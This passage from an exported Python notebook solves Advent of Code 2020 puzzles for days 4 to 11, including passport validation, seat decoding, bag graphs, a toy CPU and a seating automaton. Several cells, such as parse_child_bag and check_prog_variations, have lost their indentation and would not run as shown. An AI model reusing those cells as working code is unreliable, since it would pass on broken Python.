    log.debug(f"valid-count: {ct}")
    return ct
# In[ ]:
print("tests valid-count:", solve04a(tests))
# In[ ]:
ins = aoc.read_file_to_str('./in/day04.in').split("\n\n")
print("Day 4 a solution: valid-count:", solve04a(ins))
# In[ ]:
def passport_valid2(passport):
    """Validate one passport record against the day-4 part-2 value rules.

    *passport* is a whitespace-separated string of key:value entries.
    Returns False on the first failing rule, True when all checks pass.
    Requires the module-level fields_mandat set of mandatory keys.
    """
    entries = re.split(r'\s+', passport)
    log.debug(entries)
    fields = []
    values = []
    for entry in entries:
        field, val = entry.split(':')
        fields.append(field)
        values.append(val)
    #log.debug(sorted(fields))
    # Presence check first; value rules only run on present fields.
    if not fields_mandat.issubset(fields):
        log.debug("invalid: mandatory fields missing")
        return False
    for idx, field in enumerate(fields):
        val = values[idx]
        if field == 'byr':
            # byr (Birth Year) - four digits; at least 1920 and at most 2002.
            ival = int(val)
            if not (ival >= 1920 and ival <= 2002):
                log.debug(f"invalid: byr value {val}")
                return False
        elif field == 'iyr':
            # iyr (Issue Year) - four digits; at least 2010 and at most 2020.
            ival = int(val)
            if not (ival >= 2010 and ival <= THIS_YEAR):
                log.debug(f"invalid: iyr value {val}")
                return False
        elif field == 'eyr':
            # eyr (Expiration Year) - four digits; at least 2020 and at most 2030
            ival = int(val)
            if not (ival >= THIS_YEAR and ival <= 2030):
                log.debug(f"invalid: eyr value {val}")
                return False
        elif field == 'hgt':
            # hgt (Height) - a number followed by either cm or in:
            # - If cm, the number must be at least 150 and at most 193.
            # - If in, the number must be at least 59 and at most 76.
            # py-regex: ^(\d+)(?=cm|in)(cm|in)$
            if not re.match(r'^\d+(cm|in)$', val):
                log.debug(f"invalid: hgt val={val}, form.")
                return False
            # Lookahead split separates the digits from the unit suffix.
            numstr, unit = re.split(r'(?=cm|in)', val)
            num = int(numstr)
            if unit == 'cm':
                if not (num >= 150 and num <= 193):
                    log.debug(f"invalid: hgt val={val} num={num}")
                    return False
            elif unit == 'in':
                if not (num >= 59 and num <= 76):
                    log.debug(f"invalid: hgt val={val} num={num}")
                    return False
            else:
                log.debug(f"invalid: hgt val={val} unit={unit}")
                return False
        elif field == 'hcl':
            # hcl (Hair Color) - a # followed by exactly six characters 0-9 or a-f.
            if not re.match(r'^#[0-9a-f]{6}$', val):
                log.debug(f"invalid: hcl value {val}")
                return False
        elif field == 'ecl':
            # ecl (Eye Color) - exactly one of: amb blu brn gry grn hzl oth.
            if not val in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
                log.debug(f"invalid: ecl value {val}")
                return False
        elif field == 'pid':
            # pid (Passport ID) - a nine-digit number, including leading zeroes.
            if not re.match(r'^[0-9]{9}$', val):
                log.debug(f"invalid: pid value {val}")
                return False
    log.debug("valid!")
    return True
# In[ ]:
tests_invalid = """
eyr:1972 cid:100
hcl:#18171d ecl:amb hgt:170 pid:186cm iyr:2018 byr:1926
iyr:2019
hcl:#602927 eyr:1967 hgt:170cm
ecl:grn pid:012533040 byr:1946
hcl:dab227 iyr:2012
ecl:brn hgt:182cm pid:021572410 eyr:2020 byr:1992 cid:277
hgt:59cm ecl:zzz
eyr:2038 hcl:74454a iyr:2023
pid:3556412378 byr:2
""".strip().split("\n\n")
# In[ ]:
print("tests, all invalid:")
for passport in tests_invalid:
print(passport.replace("\n", " "))
print("valid?:", passport_valid2(passport))
print()
# In[ ]:
tests_valid = """
pid:087499704 hgt:74in ecl:grn iyr:2012 eyr:2030 byr:1980
hcl:#623a2f
eyr:2029 ecl:blu cid:129 byr:1989
iyr:2014 pid:896056539 hcl:#a97842 hgt:165cm
hcl:#888785
hgt:164cm byr:2001 iyr:2015 cid:88
pid:545766238 ecl:hzl
eyr:2022
iyr:2010 hgt:158cm hcl:#b6652a ecl:blu byr:1944 eyr:2021 pid:093154719
""".strip().split("\n\n")
# In[ ]:
print("tests, all valid:")
for passport in tests_valid:
print(passport.replace("\n", " "))
print("valid?:", passport_valid2(passport))
print()
# In[ ]:
def solve04b(passports):
    """Count passports that pass the full (part-2) field value validation."""
    ct = 0
    for passport in passports:
        log.debug(passport)
        if passport_valid2(passport):
            ct += 1
    log.debug(f"valid-count: {ct}")
    return ct
# In[ ]:
assert( 0 == solve04b(tests_invalid) )
# In[ ]:
assert( 4 == solve04b(tests_valid) )
# In[ ]:
result = solve04b(ins)
print("Day 4 b result:", result)
# ### Day 5: Binary Boarding
# In[ ]:
import functools
import operator
# see: [python - How to make a flat list out of list of lists? - Stack Overflow](https://stackoverflow.com/questions/952914/how-to-make-a-flat-list-out-of-list-of-lists)
def flatten_list(l):
    """Flatten one level of nesting: [[a, b], [c]] -> [a, b, c]."""
    flat = []
    for sub in l:
        flat += sub
    return flat
def get_seat_id(s):
    """Decode a boarding pass via binary space partitioning: row*8 + column.

    F/B halve the 0..127 row range (front/back); L/R halve the 0..7 column
    range. Cleanup: uses list(range(...)) and plain list concatenation
    instead of the project helpers aoc.range_list / flatten_list — presumed
    equivalent; TODO confirm aoc.range_list(a, b) == list(range(a, b)).
    """
    rows = list(range(0, 128))
    cols = list(range(0, 8))
    #log.debug(cols)
    for c in s:
        if c == 'F':
            rows = rows[:len(rows) // 2]
        elif c == 'B':
            rows = rows[len(rows) // 2:]
        elif c == 'L':
            cols = cols[:len(cols) // 2]
        elif c == 'R':
            cols = cols[len(cols) // 2:]
    result_list = rows + cols  # same as flatten_list([rows, cols]) without the helper
    log.debug(result_list)
    return result_list[0] * 8 + result_list[1]
# In[ ]:
boardingpass = 'FBFBBFFRLR'
get_seat_id(boardingpass)
# In[ ]:
# Given tests:
assert(357 == get_seat_id('FBFBBFFRLR'))
# In[ ]:
assert(567 == get_seat_id('BFFFBBFRRR'))
assert(119 == get_seat_id('FFFBBBFRRR'))
assert(820 == get_seat_id('BBFFBBFRLL'))
# In[ ]:
ins = aoc.read_file_to_list('./in/day05.in')
print( "Day 5 a solution:", max(map(get_seat_id, ins)) )
# In[ ]:
print("number of boarding passes given:", (len(ins)))
#print("number of used rows in plane:", (len(ins)+1)/8.0)
min_seat_id = 0*8 + 0 # from min row and min column/seat
max_seat_id = 127*8 + 7 # from max row and max column/seat
print("seat_id min/max", [min_seat_id, max_seat_id])
# In[ ]:
seat_ids = aoc.range_list(min_seat_id, max_seat_id+1)
for boardingpass in ins: # remove used/given seat_id
seat_ids.remove(get_seat_id(boardingpass))
log.debug("ids remain unseen:")
log.debug(seat_ids)
for seat_id in seat_ids:
if not( (seat_id-1) in seat_ids and (seat_id>min_seat_id) ) and not( (seat_id+1) in seat_ids and (seat_id<max_seat_id) ):
print("(Day 5 b solution) found id:", seat_id)
# ### Day 6: Custom Customs
# In[ ]:
test_str = """
abcx
abcy
abcz
""".strip()
test = test_str.split("\n")
log.debug(test)
# In[ ]:
from collections import defaultdict
# In[ ]:
def get_group_answers(answers_in):
    """Tally, per question letter, how many times it was answered across the
    group's lines (one string of letters per person)."""
    tally = defaultdict(int)
    for person in answers_in:
        for letter in person:
            tally[letter] += 1
    return tally
# In[ ]:
print("testing...", get_group_answers(test))
# In[ ]:
assert( 6 == len(get_group_answers(test).keys()) )
# In[ ]:
test_str = """
abc
a
b
c
ab
ac
a
a
a
a
b
""".strip()
tests = test_str.split("\n\n")
log.debug(tests)
# In[ ]:
def solve06a(groupanswers):
    """Sum, over groups, the number of distinct questions anyone answered."""
    total = 0
    for groupanswer in groupanswers:
        total += len(get_group_answers(groupanswer.split("\n")).keys())
    log.info(f"answerssum={total}")
    return total
# In[ ]:
assert( 11 == solve06a(tests) )
print("test assertion ok.")
# In[ ]:
ins = aoc.read_file_to_str('./in/day06.in').split("\n\n")
print("Day 6 a solution: groupanwers-sum:", solve06a(ins))
# In[ ]:
print("Day 6 b")
# In[ ]:
def get_group_answers2(answers_in):
    """Count the questions answered by EVERY person in the group.

    Fix: the original tallied raw letter occurrences, so a letter repeated
    within one person's line was counted multiple times and could miss (or
    phantom-match) the "== num_persons" test; de-duplicate per person first.
    """
    answers = defaultdict(int)
    num_persons = len(answers_in)
    for tanswers in answers_in:
        for tanswer in set(tanswers):  # each person counts a question at most once
            answers[tanswer] += 1
    # A question counts only when every person answered it.
    return sum(1 for count in answers.values() if count == num_persons)
def solve06b(groupanswers):
    """Sum, over groups, the count of questions everyone in the group answered."""
    total = 0
    for groupanswer in groupanswers:
        total += get_group_answers2(groupanswer.split("\n"))
    log.info(f"all-answers-sum={total}")
    return total
# In[ ]:
assert( 6 == solve06b(tests) )
print("test assertion ok.")
# In[ ]:
print("Day 6 b solution: groupanwers-sum:", solve06b(ins))
# ### Day 7: Handy Haversacks
# In[ ]:
import networkx as nx
# In[ ]:
test_str = """
light red bags contain 1 bright white bag, 2 muted yellow bags.
dark orange bags contain 3 bright white bags, 4 muted yellow bags.
bright white bags contain 1 shiny gold bag.
muted yellow bags contain 2 shiny gold bags, 9 faded blue bags.
shiny gold bags contain 1 dark olive bag, 2 vibrant plum bags.
dark olive bags contain 3 faded blue bags, 4 dotted black bags.
vibrant plum bags contain 5 faded blue bags, 6 dotted black bags.
faded blue bags contain no other bags.
dotted black bags contain no other bags.
""".strip()
tests = test_str.split("\n")
log.debug(test)
# In[ ]:
def get_bag_graph(l):
    """Parse "X bags contain N Y bags, ..." rules into a weighted DiGraph.

    Edge src -> dst with weight w means one src bag directly holds w dst
    bags; bags containing nothing get a 0-weight edge to the synthetic
    "END" node.
    """
    graph = nx.DiGraph()
    for line in l:
        try:
            src, trg = line.split(" bags contain ")
        except ValueError:
            log.error(f"parse error, input=>{line}<")
            continue  # fix: skip the bad line; src/trg would be undefined below
        bags_contained = trg.replace(".", "").split(", ")
        if not (len(bags_contained) == 1 and bags_contained[0].startswith("no other")):
            graph.add_node(src)
            for idx, bag_in in enumerate(bags_contained):
                # e.g. "3 faded blue bags" -> [3, "faded blue"]
                rxm = re.match(r"^(\d+)\s+(.*?)\s+bag", bag_in)
                res = [int(rxm.group(1)), rxm.group(2)]
                bags_contained[idx] = res
                graph.add_node(res[1])
                graph.add_edge(src, res[1], weight=res[0])
        else:
            graph.add_edge(src, "END", weight=0)
    log.info(f"graph # of nodes: {len(graph.nodes())}")
    log.info(f"graph # of edges: {len(graph.edges())}")
    return graph
# In[ ]:
graph = get_bag_graph(tests)
for e in graph.edges():
log.debug(f" edge: {e} attrs={nx.get_edge_attributes(graph, 'weight')[e]}")
# In[ ]:
def get_paths_to(graph, trg):
    """Collect every simple path from any node of *graph* to *trg*."""
    paths = []
    for origin in graph.nodes():
        paths.extend(nx.all_simple_paths(graph, origin, trg))
    return paths
# In[ ]:
def solve07a(l, trg):
    """Number of distinct bag colours that can (transitively) contain *trg*."""
    graph = get_bag_graph(l)
    origins = {path[0] for path in get_paths_to(graph, trg)}
    return len(origins)
# In[ ]:
trg = 'shiny gold'
assert( 4 == solve07a(tests, trg) )
# In[ ]:
ins = aoc.read_file_to_str('./in/day07.in').strip().split("\n")
print("Day 7 a solution: num-distinct-src-colors", solve07a(ins, 'shiny gold'))
# In[ ]:
print("Day 7 b")
# In[ ]:
edge_weights = nx.get_edge_attributes(graph, 'weight')
#for p in nx.all_simple_edge_paths(graph, 'shiny gold', "END"): # not available
seen_subpaths = []
for p in nx.all_simple_paths(graph, 'shiny gold', "END"):
log.debug(p)
for snode_idx in range(len(p)-1):
tup = tuple([p[snode_idx], p[snode_idx+1]])
subpath = tuple(p[0:snode_idx+2])
log.debug(f"subpath: {subpath}")
if not subpath in seen_subpaths:
seen_subpaths.append(subpath)
log.debug(" new subpath")
else:
log.debug(" already SEEN subpath")
log.debug(f" path-edge#{snode_idx}: {tup} {edge_weights[tup]}")
log.debug(seen_subpaths)
# In[ ]:
# see: [python - Getting subgraph of nodes between two nodes? - Stack Overflow](https://stackoverflow.com/questions/32531117/getting-subgraph-of-nodes-between-two-nodes)
def subgraph_between(graph, start_node, end_node):
    """Return the subgraph induced by all nodes lying on any simple path
    from *start_node* to *end_node*."""
    nodes_between = set()
    for path in nx.all_simple_paths(graph, source=start_node, target=end_node):
        nodes_between.update(path)
    return graph.subgraph(nodes_between)
# In[ ]:
subgraph = subgraph_between(graph, 'shiny gold', 'END')
for p in subgraph.edges:
log.debug(p)
log.info("sub-paths for shiny gold:")
for p in nx.all_simple_paths(subgraph, 'shiny gold', "END"):
log.info(p)
# In[ ]:
edge_weights = nx.get_edge_attributes(graph, 'weight')
seen_subpaths = []
for p in nx.all_simple_paths(graph, 'shiny gold', "END"):
log.debug(p)
for start_idx in reversed(range(len(p)-2)):
seen = False
subpath = tuple(p[0:start_idx+2])
if not subpath in seen_subpaths:
seen_subpaths.append(subpath)
else:
seen = True
tup = tuple([p[start_idx], p[start_idx+1]])
w = edge_weights[tup]
log.debug(f" subedge={tup}, weight={w}; subpath={subpath}, seen={seen}")
# In[ ]:
# Personal solution to day 7 a UNFINISHED.
clr = 'shiny gold'
clr_edges = filter(lambda it: it[0]==clr, list(graph.edges))
for edge in clr_edges:
log.debug(f"edge={edge}, edge-weight={edge_weights[edge]}")
# In[ ]:
# "Inspiration" soltion, copied/stolen from user el-guish's solution in:
# [- 2020 Day 07 Solutions - : adventofcode](https://www.reddit.com/r/adventofcode/comments/k8a31f/2020_day_07_solutions/)
# Using recursion.
rules = open('in/day07.in').readlines()
def parse_rule(r):
    """Parse one rule line into (parent_colour, [(child_colour, qty), ...]).

    The trailing two characters (period + newline) are stripped; "no other
    bags" rules yield an empty child list.
    """
    parent, contents = r[:-2].split(' bags contain ')
    childs = []
    for c in contents.split(','):
        if c not in ('no other bags', 'no other bag'):
            childs.append(parse_child_bag(c))
    return (parent, childs)
def parse_child_bag(child_st):
cparts = child_st.split()
qty = int(cparts[0])
color = ' '.join(cparts[1:-1])
return (color, qty)
def required_contents(bag_color):
    """Recursively count the total number of bags inside `bag_color`.

    Reads the module-level `contains` dict: color -> [(child_color, qty), ...].
    Each child contributes itself (q) plus q copies of its own contents.
    """
    return sum(q + q * required_contents(color) for color, q in contains[bag_color] )
# Parse the sample rules, check the expected result, then solve day 7 b on the real input.
contains = dict(parse_rule(r) for r in test_str.split("\n"))
log.debug("test rules (parsed):", contains)  # NOTE(review): logging uses %-style lazy args; this extra positional arg is likely a mistake
print("tests result", required_contents('shiny gold'))
contains = dict(parse_rule(r) for r in rules)
print("Day 7 b solution", required_contents('shiny gold'))
# ### Day 8: Handheld Halting
# In[ ]:
def read_prog(l):
    """Parse handheld-console source lines like 'acc +1' into mutable [op, arg] pairs.

    Uses a plain list comprehension instead of the project `aoc.map_list`
    helper (same result, no helper dependency).
    """
    outlst = [it.split(' ') for it in l]
    for instr in outlst:
        instr[1] = int(instr[1])  # int() accepts the explicit '+' sign
    return outlst
# In[ ]:
def run_cpu_prog(prog):
    """Execute the day-8 handheld program until an instruction repeats
    (infinite loop) or the program counter runs off the end.

    Returns the accumulator value at that point.
    Changes vs. original: `seen` is a set (O(1) membership instead of O(n)
    list scan), and `instr` is initialized so the break-log lines cannot
    raise NameError on an empty program.
    """
    cpuct = 0
    pptr = 0
    prog_len = len(prog)
    seen = set()
    acc = 0
    instr = None  # last executed instruction (None before the first step)
    while True:
        cpuct += 1
        if pptr in seen:
            log.info(f"found inf-loop @cpuct={cpuct} @instr#={pptr} : {instr}")
            break
        elif pptr == prog_len:
            log.info(f"found prog-term @cpuct={cpuct} @instr#={pptr} : {instr}")
            break
        else:
            seen.add(pptr)
        instr = prog[pptr]
        op, par = instr
        log.debug(f"instr#{cpuct} instr={instr}")
        if cpuct > 10_000:
            raise Exception("failsafe")
        if op == 'nop':
            pptr += 1
        elif op == 'acc':
            acc += par
            pptr += 1
        elif op == 'jmp':
            pptr += par
        else:
            raise Exception(f"unknown opcode in {instr}")
    return acc
# In[ ]:
# Sample program from the day 8 puzzle statement.
tests = """
nop +0
acc +1
jmp +4
acc +3
jmp -3
acc -99
acc +1
jmp -4
acc +6
""".strip().split("\n")
log.debug(tests)
test_prog = read_prog(tests)
log.debug(test_prog)
# In[ ]:
run_cpu_prog(test_prog)
# In[ ]:
ins = aoc.read_file_to_str('./in/day08.in').strip().split("\n")
prog = read_prog(ins)
print("Day 8 a solution: acc:", run_cpu_prog(prog))
# In[ ]:
print("Day 8 b")
# In[ ]:
def check_cpu_prog(prog):
    """Return True if the program terminates (pptr reaches len(prog)),
    False if an infinite loop is detected.

    Changes vs. original: `seen` is a set (O(1) membership), `instr` is
    initialized so the termination log cannot NameError on an empty program,
    and the unreachable trailing `return acc` dead code was removed (the
    loop only exits via return or raise).
    """
    prog_len = len(prog)
    cpuct = 0
    pptr = 0
    seen = set()
    acc = 0
    instr = None  # last executed instruction (None before the first step)
    while True:
        if pptr == prog_len:
            log.debug(f"OK: prog terminates! @cpuct={cpuct} @instr#={pptr} : last-instr={instr}")
            return True
        cpuct += 1
        instr = prog[pptr]
        op, par = instr
        if pptr in seen:
            log.debug(f"Fail: found inf-loop @cpuct={cpuct} @instr#={pptr} : {instr}")
            return False
        else:
            seen.add(pptr)
        if cpuct > 10_000:
            raise Exception("failsafe")
        if op == 'nop':
            pptr += 1
        elif op == 'acc':
            acc += par
            pptr += 1
        elif op == 'jmp':
            pptr += par
        else:
            raise Exception(f"unknown opcode in {instr}")
# In[ ]:
# Sanity-check the terminator-detection on the sample program.
print("test result: check-cpu-prog", check_cpu_prog(test_prog))
# In[ ]:
from copy import deepcopy
def check_prog_variations(prog):
base_prog = deepcopy(prog)
altinstrs = []
for idx, instr in enumerate(base_prog):
if instr[0] in ['nop', 'jmp']:
altinstrs.append([idx, instr])
log.debug(f"alternate instructions: {altinstrs}")
if check_cpu_prog(base_prog):
#log.debug("prog=", base_prog)
acc = run_cpu_prog(base_prog)
log.debug(f"prog ok, acc={acc}")
for elem in altinstrs:
#log.debug("elem:", elem)
idx, v = elem
instr, par = v
prog = deepcopy(base_prog)
if instr == 'nop':
prog[idx][0] = 'jmp'
elif instr == 'jmp':
prog[idx][0] = 'nop'
#log.debug(f"new-instr @{idx}={prog[idx][0]}")
#log.debug("new-prog=", prog)
if check_cpu_prog(prog):
acc = run_cpu_prog(prog)
log.info(f"prog ok, acc={acc}")
break
return acc
# In[ ]:
result = check_prog_variations(test_prog)
print("test result: check-prog-variations", result)
# In[ ]:
result = check_prog_variations(read_prog(ins))
print("Day 8 b result: check-prog-variations", result)
# ### Day 9: Encoding Error
# In[ ]:
# XMAS cipher sample data from the day 9 puzzle statement.
tests = """
35
20
15
25
47
40
62
55
65
95
102
117
150
182
127
219
299
277
309
576
""".strip().split("\n")
# In[ ]:
from typing import List
def pp_lst(lst):
    """Pretty-print a list compactly as '[a,b,c]' (no spaces).

    Uses builtin map/join instead of the project `aoc.map_list` helper.
    """
    return "[" + ",".join(map(str, lst)) + "]"
def check_xmas_data(xmas_data: int, preamble: List[int]) -> bool:
    """Return True when xmas_data is the sum of two distinct preamble entries."""
    for a, b in itertools.combinations(preamble, 2):  # no entry paired with itself
        if a + b == xmas_data:
            return True
    return False
def check_xmas_data_seq(xmas_data_seq: List[int], preamble: List[int]) -> bool:
    """Validate every value of xmas_data_seq against a sliding preamble window.

    NOTE: `preamble` is mutated in place (oldest entry dropped, new value
    appended) — callers rely on this side effect.
    """
    all_ok = True
    for value in xmas_data_seq:
        all_ok &= check_xmas_data(value, preamble)
        preamble.pop(0)
        preamble.append(value)
    return all_ok
# In[ ]:
preamble0 = list(range(1, 25+1)) # numbers 1..25
log.debug(preamble0)
# In[ ]:
assert( True == check_xmas_data(26, preamble0) )
assert( True == check_xmas_data(49, preamble0) )
assert( False == check_xmas_data(100, preamble0) )
assert( False == check_xmas_data(50, preamble0) )
# In[ ]:
preamble1 = flatten_list( [[20], list(range(1, 20)), list(range(21, 26))] )
log.debug(preamble1)
# In[ ]:
# NOTE: check_xmas_data_seq mutates preamble1, so these asserts are order-dependent.
assert( True == check_xmas_data_seq([45, 26], preamble1) )
assert( False == check_xmas_data_seq([45, 65], preamble1) )
assert( True == check_xmas_data_seq([45, 64], preamble1) )
assert( True == check_xmas_data_seq([45, 66], preamble1) )
# In[ ]:
def verify_xmas_data_seq(xmas_data_rawseq: List[int], preamble_len=25) -> List[list]:
    """Check each post-preamble value against its sliding window.

    List `xmas_data_rawseq` contains the preamble as head.
    Returns a list of [value, ok] pairs, one per checked value.
    (Fix: the original annotation claimed `-> bool`, but the function
    returns the `oks` list; also dropped an unused local reassignment.)
    """
    preamble = xmas_data_rawseq[0:preamble_len]
    xmas_data_seq = xmas_data_rawseq[preamble_len:]
    log.debug(f"[verify_xmas_data_seq] xmas_data_seq:{pp_lst(xmas_data_seq)}, preamble:{pp_lst(preamble)}")
    oks = []
    for xmas_data in xmas_data_seq:
        ok = check_xmas_data(xmas_data, preamble)
        oks.append([xmas_data, ok])
        preamble.pop(0)
        preamble.append(xmas_data)
    return oks
# In[ ]:
# Verify the sample (127 is the only invalid number), then the real input.
raw_testdata = aoc.map_list(int, tests)
res = verify_xmas_data_seq(raw_testdata, preamble_len=5)
res = aoc.map_list(lambda it: it[0], aoc.filter_list(lambda it: it[1] == False, res))
log.info(f"test False results: {res}")
assert( [127] == res )
# In[ ]:
ins = aoc.map_list(int, aoc.read_file_to_list('./in/day09.in'))
log.debug(ins)
# In[ ]:
res = verify_xmas_data_seq(ins, preamble_len=25)
res = aoc.map_list(lambda it: it[0], aoc.filter_list(lambda it: it[1] == False, res))
log.info(f"found invalid number(s): {res}")
invalid_num = res[0]
print("Day 9 a solution:", invalid_num)  # fixed copy-paste label: this is the Day 9 section, not Day 8
# In[ ]:
# see: [python - List all contiguous sub-arrays](https://stackoverflow.com/questions/41576911/list-all-contiguous-sub-arrays)
def get_all_windows(lst, min_win_len=1):
    """Generator yielding every contiguous sublist of lst, shortest windows first."""
    total = len(lst)
    for width in range(min_win_len, total + 1):
        for start in range(total - width + 1):
            yield lst[start:start + width]
# In[ ]:
# Day 9 b (sample): find a contiguous window summing to the invalid number.
test_invalidnum = 127
raw_testdata2 = raw_testdata.copy()
raw_testdata2.remove(test_invalidnum)
for subl in get_all_windows(raw_testdata2):
    if sum(subl) == test_invalidnum:
        log.info(f"found fulfilling-window: {subl}")
        break
# In[ ]:
# Same search on the real input; the answer is min(window) + max(window).
ins2 = ins.copy()
ins2.remove(invalid_num)
for subl in get_all_windows(ins2):
    if sum(subl) == invalid_num:
        log.info(f"found fulfilling-window: {subl}")
        min_elem = min(subl)
        max_elem = max(subl)
        solut = min_elem+max_elem
        log.info(f"min, max, sum: {[min_elem, max_elem, solut]}")
        break
# ### Day 10: Adapter Array
# In[ ]:
def solve10a(loi):
    """Day 10 a: chain all adapters greedily (always the smallest usable next)
    and return (#1-jolt-gaps) * (#3-jolt-gaps).  `loi` is the adapter list."""
    current = 0
    remainders = loi.copy()
    chain = [current]
    jolts = []
    for i in range(len(remainders)):
        # candidates reachable from `current` (difference 0..3)
        targets = filterl(lambda it: it >= current and it <= current + 3, remainders)
        target = min(targets)
        remainders.remove(target)
        #log.debug(f"#{i} from={current} targets={targets}, target={target}, djolt={target-current}, remainders={remainders}")
        chain.append(target)
        jolts.append(target-current)
        current = target
        if len(remainders) == 0:
            jolts.append(3) # final device is 3 jolts higher than last adapter in chain
            j1 = jolts.count(1)
            j3 = jolts.count(3)
            res = j1*j3
            log.info(f"chain {aoc.cl(chain)} terminated ok, jolts={aoc.cl(jolts)}, j1#={j1}, j3#={j3}, res={res}")
            return j1*j3
    raise Exception("solution not found")
# In[ ]:
# Day 10 sample 1 (expected 7 one-jolt and 5 three-jolt gaps).
tests = """
16
10
15
5
1
11
7
19
6
12
4
""".strip().split("\n")
tests1 = aoc.map_list(int, tests)
log.debug(f"test1={tests1}")
res = solve10a(tests1)
aoc.assert_msg("test 1", 7*5 == res)
log.info(f"tests1 solution: {res}")
# Day 10 sample 2 (expected 220).
tests = """
28
33
18
42
31
14
46
20
48
47
24
23
49
45
19
38
39
11
1
32
25
35
8
17
7
9
4
2
34
10
3
""".strip().split("\n")
log.setLevel( logging.INFO )
tests2 = mapl(int, tests)
res = solve10a(tests2)
aoc.assert_msg("test 2", 220 == res)
log.info(f"tests2 solution: {res}")
# In[ ]:
ins = mapl(int, aoc.read_file_to_list('./in/day10.in'))
res = solve10a(ins)
log.info(f"Day 10 a solution: {res}")
# In[ ]:
import time
def find_paths(loi): # loi is a list of ints (input)
    """Day 10 b: count all distinct adapter chains, level by level.

    Instead of enumerating every path, partial paths are grouped by their
    last element and only a multiplicity count is carried per group
    ([last-element, path-count] pairs in `last_partials`).
    """
    start_tm = int(time.time())
    end_elem = max(loi)
    partials = {0: [[0]]}
    found_num = 0
    current = 0
    iter = 0
    lastlevel_partials = 0 # just only for printing (debugging)
    last_partials = [[0, 1]]  # [last-element, number-of-paths-ending-there]
    elems_avail = loi.copy()
    for lvl in range(1, len(loi)+1):
        last_partials_keys = mapl(lambda it: it[0], last_partials)
        min_last_elem = min(last_partials_keys)
        # adapters below the smallest open endpoint can never be used again
        elems_avail = filterl(lambda it: it > min_last_elem, elems_avail)
        filtered_elems = {}
        last_partials_count = {}
        for src in sorted(set(last_partials_keys)):
            filtered_elems[src] = filterl(lambda it: it > src and it <= src + 3, elems_avail)
            last_partials_count[src] = sum(mapl(lambda it: it[1], filterl(lambda it: it[0]==src, last_partials)))
        partials_diff = len(last_partials_keys)-lastlevel_partials
        needed_tm = int(time.time()) - start_tm
        log.debug(f"level={lvl} @{needed_tm}s, found={found_num}, paths-diff={partials_diff:,} before-partials-#={len(last_partials):,}, min-last-elem={min_last_elem}, elems_avail#={len(elems_avail)}")
        log.debug(f"  last-partials-ct={last_partials_count}")
        lastlevel_partials = len(last_partials)
        partials = []
        for partial in sorted(set(last_partials_keys)): #last_partials:
            iter += 1
            if iter % 100_000_000 == 0:
                log.debug(f"at iter#={iter:,}, found#={found_num}, level={lvl}")
            #if iter > 10_000_000_000: # FAILSAFE
            #    return found
            targets = filtered_elems[partial]
            for target in targets:
                if target == end_elem:
                    # reaching the maximum adapter completes this many paths
                    if found_num % 100_000 == 0:
                        log.debug(f"at found# {found_num}")
                    found_num += last_partials_count[partial]
                else:
                    partials.append( [target, last_partials_count[partial]] )
        last_partials = partials
    log.info(f"level={lvl} @{needed_tm}s, found={found_num}, paths-diff={partials_diff:,} before-partials-#={len(last_partials):,}, min-last-elem={min_last_elem}, elems_avail#={len(elems_avail)}")
    return found_num
# In[ ]:
#log.setLevel( aoc.LOGLEVEL_TRACE )
log.debug(f"effective-log-level={log.getEffectiveLevel()}")
found = find_paths(tests1)
log.info(f"tests1 found {found} from {tests1}")
assert( 8 == found )
# In[ ]:
found = find_paths(tests2)
log.info(f"test2 found {found} paths") # 19208
assert( 19208 == found )
# In[ ]:
found = find_paths(ins)
log.info(f"Day 10 b solution: found {found} paths")
# ### Day 11: Seating System
# In[ ]:
#log.setLevel( aoc.LOGLEVEL_TRACE )
log.debug(f"effective-log-level={log.getEffectiveLevel()}")
# In[ ]:
import copy # for deepcopy
import hashlib
class CellularWorld:
    """2-D cellular automaton over a list-of-lists of single chars (day 11 seating)."""

    def __init__(self, world, store_hashes=False):
        """World object constructor, world has to be given as a list-of-lists of chars."""
        self.world = world
        self.dim = [len(world[0]), len(world)]   # [width, height]
        self.iter_num = 0
        log.info(f'[CellularWorld] new dim={self.dim}')
        self.store_hashes = store_hashes
        if self.store_hashes:
            self.world_hashes = [self.get_hash()]

    def repr(self):
        """Return representation str (can be used for printing)."""
        return str.join("\n", map(lambda it: str.join('', it), self.world))

    def set_world(self, world):
        """Replace the grid and recompute dimensions."""
        self.world = world
        self.dim = [len(world[0]), len(world)]

    def get_hash(self):
        """SHA1 of the textual representation; cheap state-equality check."""
        return hashlib.sha1(self.repr().encode()).hexdigest()

    def get_neighbors8(self, x, y):
        """Get cell's surrounding 8 neighbors as a string, omitting boundaries."""
        log.trace(f"[CellularWorld]:get_neighbors8({x},{y})")
        dim_x = self.dim[0]
        dim_y = self.dim[1]
        neighbors = ''
        for nx in range(x-1, x+2):
            for ny in range(y-1, y+2):
                if (nx >= 0 and nx < dim_x) and (ny >= 0 and ny < dim_y) and not (nx == x and ny == y):
                    neighbors += self.world[ny][nx]
        return neighbors

    def iterate(self, steps=1):
        """Apply the day-11 part-a rules for `steps` generations:
        'L' with no occupied neighbor becomes '#'; '#' with >= 4 becomes 'L'."""
        for i in range(steps):
            world2 = copy.deepcopy(self.world)
            for y in range(self.dim[1]):
                for x in range(self.dim[0]):
                    val = self.world[y][x]
                    neighbors = self.get_neighbors8(x, y)
                    if val == 'L' and neighbors.count('#') == 0:
                        world2[y][x] = '#'
                    elif val == '#' and neighbors.count('#') >= 4:
                        world2[y][x] = 'L'
            self.iter_num += 1
            self.set_world(world2)
            if self.store_hashes:
                self.world_hashes.append(self.get_hash())

    def find_cycle(self, max_iter=1_000):
        """This may only be called at initial state, before any previous iterations.

        BUGFIX: the original body operated on a global `world` instead of
        `self`, and seeded `seen` with the bound method object (`world.repr`,
        missing call parentheses) instead of the representation string.
        """
        seen = [self.repr()]
        for i in range(max_iter):
            if i % 1_000 == 0:
                log.debug(f"iter# {i}, still running")
            self.iterate()
            world_repr = self.repr()
            if world_repr in seen:
                start_idx = seen.index(world_repr)
                log.info(f"found cycle @ iter={i+1}, seen-idx={start_idx}")
                return([start_idx, i+1])
            else:
                seen.append(world_repr)
        raise Exception("no world iter cycle found")

    def find_stable(self, max_iter=1_000):
        """Iterate until two consecutive states hash identically; returns True."""
        last_hash = self.get_hash()
        for i in range(1, max_iter+1):
            self.iterate()
            this_hash = self.get_hash()
            if this_hash == last_hash:
                log.info(f"[CellularWorld:find_stable] BREAK on stable beginning @{i-1}")
                return True
            else:
                last_hash = this_hash
        raise Exception(f"[CellularWorld:find_stable] NO stable world iter found, after break on {max_iter} steps")
# In[ ]:
